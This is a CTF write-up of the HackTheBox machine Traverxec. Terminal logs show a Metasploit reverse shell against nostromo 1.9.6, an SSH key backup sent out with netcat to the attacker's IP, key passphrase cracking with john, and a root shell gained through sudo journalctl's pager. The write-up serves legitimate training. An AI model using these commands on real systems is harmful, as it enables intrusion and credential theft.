Traverxec HackTheBox
Traverxec HackTheBox

HackTheBox Traverxec write-up to learn getting root by solving this CTF machine. Lets see what all we learn till the root # shell. The machine has tags web and file miss-configuration and is an Easy machine on HTB platform.

The Initial NMAP scan reveals 2 ports open 22 and 80, on which we again run a comprehensive scan.

                                                                               
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ nmap -p- --min-rate=1000 -T5 10.10.10.165 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 23:29 IST
Nmap scan report for traverxec.htb (10.10.10.165)
Host is up (0.17s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 128.36 seconds
                                                                                
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ sudo nmap -p22,80 -sV -sC -A -O -oN traverxec traverxec.htb 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 23:35 IST
Nmap scan report for traverxec.htb (10.10.10.165)
Host is up (0.27s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 5.1 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   345.11 ms 10.10.14.1
2   345.25 ms traverxec.htb (10.10.10.165)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.23 seconds

Evident from the scan that the machine is running nostromo HTTP Server 1.9.6 on port 80, a web page with title TRAVERXEC.

A little search with just name and version will reveal presence of RCE exploit that can be downloaded here .
However I got to metasploit which also has something when you search nostromo

                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ msfconsole
[!] The following modules could not be loaded!..\
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] Please see /home/abhinav/.msf4/logs/framework.log for details.
                                                  

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V5                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           https://metasploit.com


       =[ metasploit v6.0.53-dev                          ]
+ -- --=[ 2149 exploits - 1143 auxiliary - 366 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: View missing module options with show 
missing

msf6 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nostromo_code_exec

msf6 > use 0
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(multi/http/nostromo_code_exec) > show options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)


msf6 exploit(multi/http/nostromo_code_exec) > set rhosts traverxec.htb
rhosts => traverxec.htb
msf6 exploit(multi/http/nostromo_code_exec) > set lhost tun0
lhost => 10.10.14.8
msf6 exploit(multi/http/nostromo_code_exec) > set lport 7777
lport => 7777
msf6 exploit(multi/http/nostromo_code_exec) > show options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   traverxec.htb    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.8       yes       The listen address (an interface may be specified)
   LPORT  7777             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)


msf6 exploit(multi/http/nostromo_code_exec) > 

Lets run the above exploit now to see magic and also get a TTY shell.

msf6 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 10.10.14.8:7777 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 2 opened (10.10.14.8:7777 -> 10.10.10.165:44536) at 2021-07-28 00:38:33 +0530

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c'import pty;pty.spawn("/bin/bash")'
www-data@traverxec:/usr/bin$ 

Lets find more, do some enumeration.

www-data@traverxec:/usr/bin$ awk -F: '($3>=1000)&&($1!="nobody"){print $1}' /etc/passwd
< '($3>=1000)&&($1!="nobody"){print $1}' /etc/passwd
david
www-data@traverxec:/usr/bin$ 

Further we can see few more information at /var/nostromo which contains the config file as nhttpd.conf, saying more about username and file which contains password.

www-data@traverxec:/usr/bin$ cd /var
cd /var
www-data@traverxec:/var$ ls
ls
backups  cache	lib  local  lock  log  mail  nostromo  opt  run  spool	tmp
www-data@traverxec:/var$ cd nostromo
cd nostromo
www-data@traverxec:/var/nostromo$ ls
ls
conf  htdocs  icons  logs
www-data@traverxec:/var/nostromo$ cd conf
cd conf
www-data@traverxec:/var/nostromo/conf$ ls
ls
mimes  nhttpd.conf
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.confg
cat nhttpd.confg
cat: nhttpd.confg: No such file or directory
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
cat nhttpd.conf
# MAIN [MANDATORY]

servername		traverxec.htb
serverlisten		*
serveradmin		david@traverxec.htb
serverroot		/var/nostromo
servermimes		conf/mimes
docroot			/var/nostromo/htdocs
docindex		index.html

# LOGS [OPTIONAL]

logpid			logs/nhttpd.pid

# SETUID [RECOMMENDED]

user			www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess		.htaccess
htpasswd		/var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons			/var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs		/home
homedirs_public		public_www
www-data@traverxec:/var/nostromo/conf$ 
www-data@traverxec:/var/nostromo/conf$ cat /var/nostromo/conf/.htpasswd
cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
www-data@traverxec:/var/nostromo/conf$ 

The nhttpd.conf file contains some more information about the home directory section. Lets fine more into these directories.

# HOMEDIRS [OPTIONAL]

homedirs		/home
homedirs_public		public_www

The files under home are not read simply but public_www is readable.

# HOMEDIRS [OPTIONAL]

homedirs		/home
homedirs_public		public_www
www-data@traverxec:/var/nostromo/conf$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root  root  4096 Oct 25  2019 .
drwxr-xr-x 18 root  root  4096 Oct 25  2019 ..
drwx--x--x  5 david david 4096 Oct 25  2019 david
www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/
ls -la /home/david/
ls: cannot open directory '/home/david/': Permission denied
www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/public_www
ls -la /home/david/public_www
total 16
drwxr-xr-x 3 david david 4096 Oct 25  2019 .
drwx--x--x 5 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david  402 Oct 25  2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25  2019 protected-file-area
www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/public_www/protected-file-area
<$ ls -la /home/david/public_www/protected-file-area
total 16
drwxr-xr-x 2 david david 4096 Oct 25  2019 .
drwxr-xr-x 3 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david   45 Oct 25  2019 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25  2019 backup-ssh-identity-files.tgz
www-data@traverxec:/var/nostromo/conf$ 

get the file via netcat

www-data@traverxec:/var/nostromo/conf$ id  
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@traverxec:/var/nostromo/conf$ nc 10.10.14.8 9876 < /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz
<w/protected-file-area/backup-ssh-identity-files.tgz

                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ nc -lvp 9876 > backup.tgz
listening on [any] 9876 ...
connect to [10.10.14.8] from traverxec.htb [10.10.10.165] 60010
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ tar -xvf backup.tgz                                                                                                                                                                                                                   2 
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub

We have a key, which can be potentially for the david user. Let’s try.

                                                                                                                                                                                                                                           
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ sudo chmod 400 id_rsa
    
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ ssh -i id_rsa david@traverxec.htb                                                                                                                                                                                                   127 
The authenticity of host 'traverxec.htb (10.10.10.165)' can't be established.
ECDSA key fingerprint is SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

And that is asking a password, we will have to try more to get there, let’s get the hash from id_rsa and crack using john.

                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ python /usr/share/john/ssh2john.py id_rsa > hash2.txt                                                                                                                                                                                 1 
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ john --wordlist=../rockyou.txt hash2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:13 DONE (2021-07-28 01:24) 0.07183g/s 1030Kp/s 1030Kc/s 1030KC/sa6_123..*7¡Vamos!
Session completed
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ john --show hash2.txt
id_rsa:hunter

1 password hash cracked, 0 left
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ 

Enter the passphrase hunter on the ssh to david @ traverxec.htb and we are in.

                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ ssh -i id_rsa david@traverxec.htb                                                                                                                                                                                                   255 
Enter passphrase for key 'id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$ 

We are at a sweet spot now, grab the user flag from user.txt .

david@traverxec:~$ ls
bin  public_www  user.txt
david@traverxec:~$ cat user.txt
7db0b48469606a42cec20750d9782f3d
david@traverxec:~$ 

Privilege Escalation

We see interesting entry/file in david’s home with following content.

david@traverxec:~$ ls
bin  public_www  user.txt
david@traverxec:~$ cd bin
david@traverxec:~/bin$ ls
server-stats.head  server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 
david@traverxec:~/bin$ 

The last line of the script executes journalctl with sudo, interesting, let’s execute and see.

david@traverxec:~/bin$ ./server-stats.sh 
                                                                          .----.
                                                              .---------. | == |
   Webserver Statistics and Data                              |.-"""""-.| |----|
         Collection Script                                    ||       || | == |
          (c) David, 2019                                     ||       || |----|
                                                              |'-.....-'| |::::|
                                                              '"")---(""' |___.|
                                                             /:::::::::::\"    "
                                                            /:::=======:::\
                                                        jgs '"""""""""""""' 

Load:  16:06:03 up  2:14,  1 user,  load average: 0.00, 0.00, 0.00
 
Open nhttpd sockets: 0
Files in the docroot: 117
 
Last 5 journal log lines:
-- Logs begin at Tue 2021-07-27 13:51:42 EDT, end at Tue 2021-07-27 16:06:03 EDT. --
Jul 27 13:51:44 traverxec systemd[1]: Starting nostromo nhttpd server...
Jul 27 13:51:44 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after start: No such file or directory
Jul 27 13:51:44 traverxec nhttpd[420]: started
Jul 27 13:51:44 traverxec nhttpd[420]: max. file descriptors = 1040 (cur) / 1040 (max)
Jul 27 13:51:44 traverxec systemd[1]: Started nostromo nhttpd server.
david@traverxec:~/bin$ 

We move to gtfobins to see anything interesting related to journalctl and find we have.
Interestingly journalctl is invokes default pager, which is less, less waits for user input after displaying output, and can be exploited.

Let us execute – /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service [ DONT EXECUTE WHEN TERMINAL IS MAXIMIZED, Make Terminal Window Small]
just when we execute this, the less is waiting for input where we enter – !/bin/bash , voila ! we have a root shell.

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2021-07-27 13:51:42 EDT, end at Tue 2021-07-27 16:41:32 EDT
Jul 27 13:51:44 traverxec systemd[1]: Starting nostromo nhttpd server...
Jul 27 13:51:44 traverxec systemd[1]: nostromo.service: Can't open PID file /var
Jul 27 13:51:44 traverxec nhttpd[420]: started
Jul 27 13:51:44 traverxec nhttpd[420]: max. file descriptors = 1040 (cur) / 1040
Jul 27 13:51:44 traverxec systemd[1]: Started nostromo nhttpd server.
lines 1-6/6 (END)
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2021-07-27 13:51:42 EDT, end at Tue 2021-07-27 16:41:32 EDT
Jul 27 13:51:44 traverxec systemd[1]: Starting nostromo nhttpd server...
Jul 27 13:51:44 traverxec systemd[1]: nostromo.service: Can't open PID file /var
Jul 27 13:51:44 traverxec nhttpd[420]: started
Jul 27 13:51:44 traverxec nhttpd[420]: max. file descriptors = 1040 (cur) / 1040
Jul 27 13:51:44 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin# 

Root Flag.

root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls
nostromo_1.9.6-1.deb  root.txt
root@traverxec:~# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906
root@traverxec:~# 

Exploitation completed, Flags found, What we learnt so far
– be versed with netcat, listening , getting files
– enumeration is the key.
– nmap to see open ports
– metasploit and exploit_db database to search any exploits, or searchsploit
– spawn TTY Shells where possible
– searching well for known services, reading documentations ( here nostoromo )
– never ignore the ssh keys , id_rsa
– getting the password from encrypted id_rsa (ssh2john )
– using john / online resources to crack/search the hashes
– privilege escalation via journalctl/less to root

LEAVE A REPLY

Please enter your comment!
Please enter your name here